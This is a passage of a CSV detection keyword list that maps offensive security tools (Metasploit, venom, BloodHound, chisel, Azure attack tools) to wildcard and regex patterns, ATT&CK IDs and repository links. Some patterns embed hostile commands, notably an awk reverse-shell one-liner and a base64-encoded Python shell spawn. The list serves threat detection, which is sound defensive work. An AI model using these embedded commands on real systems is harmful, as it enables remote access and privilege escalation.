tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/privilege_escalation.*",".{0,1000}aux\/privilege_escalation\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/Start-Webserver.ps1*",".{0,1000}aux\/Start\-Webserver\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*auxiliary/crawler*",".{0,1000}auxiliary\/crawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auxiliary/sqli/*",".{0,1000}auxiliary\/sqli\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*av_hips_executables.txt*",".{0,1000}av_hips_executables\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Available ProgIDs and CLSIDs for DLL Hijacking:*",".{0,1000}Available\sProgIDs\sand\sCLSIDs\sfor\sDLL\sHijacking\:.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*avast_memory_dump.md*",".{0,1000}avast_memory_dump\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*avet-master.zip*",".{0,1000}avet\-master\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*avflagged.exe*",".{0,1000}avflagged\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*avrdude -c usbasp -p m328p -U flash:w:avr.hex*",".{0,1000}avrdude\s\-c\susbasp\s\-p\sm328p\s\-U\sflash\:w\:avr\.hex.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*avred-main.zip*",".{0,1000}avred\-main\.zip.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*av-update-urls.txt*",".{0,1000}av\-update\-urls\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp*",".{0,1000}aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*",".{0,1000}aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*Aw8KAw4LDgvZDgLUz2rLC2rPBMC*",".{0,1000}Aw8KAw4LDgvZDgLUz2rLC2rPBMC.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*awesome-cve-poc*",".{0,1000}awesome\-cve\-poc.{0,1000}","offensive_tool_keyword","POC","list of poc exploitation for nown CVE","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","10","3230","717","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z" "*Awesome-Hacking*",".{0,1000}Awesome\-Hacking.{0,1000}","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","77481","8710","2024-04-13T12:39:36Z","2016-03-30T15:47:10Z" "*Awesome-Hacking-Resources*",".{0,1000}Awesome\-Hacking\-Resources.{0,1000}","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","14716","2077","2024-03-12T00:19:30Z","2017-10-10T19:09:18Z" "*awesome-osint*",".{0,1000}awesome\-osint.{0,1000}","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","16497","2574","2024-04-27T10:16:53Z","2016-11-30T13:26:11Z" "*awesome-pentest*",".{0,1000}awesome\-pentest.{0,1000}","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","20539","4373","2024-04-28T22:51:39Z","2014-08-03T23:13:53Z" "*awesome-pentest-cheat-sheets*",".{0,1000}awesome\-pentest\-cheat\-sheets.{0,1000}","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3736","764","2024-02-16T13:38:52Z","2016-11-29T00:00:18Z" "*awesome-scapy*",".{0,1000}awesome\-scapy.{0,1000}","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","2","196","30","2023-03-08T23:26:41Z","2020-02-04T12:17:35Z" "*awesome-static-analysis*",".{0,1000}awesome\-static\-analysis.{0,1000}","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*awesome-web-security*",".{0,1000}awesome\-web\-security.{0,1000}","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10835","1651","2024-02-22T00:28:07Z","2017-01-29T16:50:21Z" "*awesome-windows-domain-hardening*",".{0,1000}awesome\-windows\-domain\-hardening.{0,1000}","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","10","1708","267","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z" "*awk 'BEGIN {s = ""/inet/tcp/0/*"";*printf ""shell>"" |& s;*getline*print $0 |& s;*close*}' /dev/null*",".{0,1000}awk\s\'BEGIN\s\{s\s\=\s\""\/inet\/tcp\/0\/.{0,1000}\""\;.{0,1000}printf\s\""shell\>\""\s\|\&\ss\;.{0,1000}getline.{0,1000}print\s\$0\s\|\&\ss\;.{0,1000}close.{0,1000}\}\'\s\/dev\/null.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*awk_reverse_tcp.py*",".{0,1000}awk_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*aws configure --profile exegol*",".{0,1000}aws\sconfigure\s\-\-profile\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*AWS_BUCKET=nemesis-test*",".{0,1000}AWS_BUCKET\=nemesis\-test.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*AWS_KMS_KEY_ALIAS=nemesis-dev*",".{0,1000}AWS_KMS_KEY_ALIAS\=nemesis\-dev.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*awsloot.py *",".{0,1000}awsloot\.py\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*axcrypt2john.py*",".{0,1000}axcrypt2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*aydinnyunus/PassDetective*",".{0,1000}aydinnyunus\/PassDetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*azfvgayqKwtFApcvyRedpUXculaeCCGA*",".{0,1000}azfvgayqKwtFApcvyRedpUXculaeCCGA.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*Azure-AccessPermissions.ps1*",".{0,1000}Azure\-AccessPermissions\.ps1.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Azure-AccessPermissions-master*",".{0,1000}Azure\-AccessPermissions\-master.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AzureAD AutoLogon Brute*",".{0,1000}AzureAD\sAutoLogon\sBrute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","1","97","23","2024-02-21T20:22:50Z","2021-10-01T05:20:25Z" "*AzureAD_Autologon_Brute*",".{0,1000}AzureAD_Autologon_Brute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","1","N/A","N/A","1","97","23","2024-02-21T20:22:50Z","2021-10-01T05:20:25Z" "*azuread_decrypt_msol_*.ps1*",".{0,1000}azuread_decrypt_msol_.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","powershell","method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync","T1003.006","TA0006","N/A","N/A","Credential Access","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AzureADLateralMovement*",".{0,1000}AzureADLateralMovement.{0,1000}","offensive_tool_keyword","AzureADLateralMovement","AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing Lateral Movement graph data compatible with Bloodhound 2.2.0","T1074 - T1075 - T1076","TA0008 - TA0009 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/talmaor/AzureADLateralMovement","1","1","N/A","N/A","2","117","23","2022-12-08T06:44:48Z","2019-06-22T06:13:28Z" "*AzureADRecon.ps1*",".{0,1000}AzureADRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*AzureC2Relay.zip*",".{0,1000}AzureC2Relay\.zip.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*AzureC2Relay-main*",".{0,1000}AzureC2Relay\-main.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*AzureHound.ps1*",".{0,1000}AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*azurehound/v2*",".{0,1000}azurehound\/v2.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*-b bleeding-jumbo*",".{0,1000}\-b\sbleeding\-jumbo.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*'B','e','a','c','o','n'*",".{0,1000}\'B\',\'e\',\'a\',\'c\',\'o\',\'n\'.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*B03A3AF9-9448-43FE-8CEE-5A2C43BFAC86*",".{0,1000}B03A3AF9\-9448\-43FE\-8CEE\-5A2C43BFAC86.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb*",".{0,1000}b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8*",".{0,1000}b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32*",".{0,1000}b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b*",".{0,1000}b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810*",".{0,1000}b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb*",".{0,1000}b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 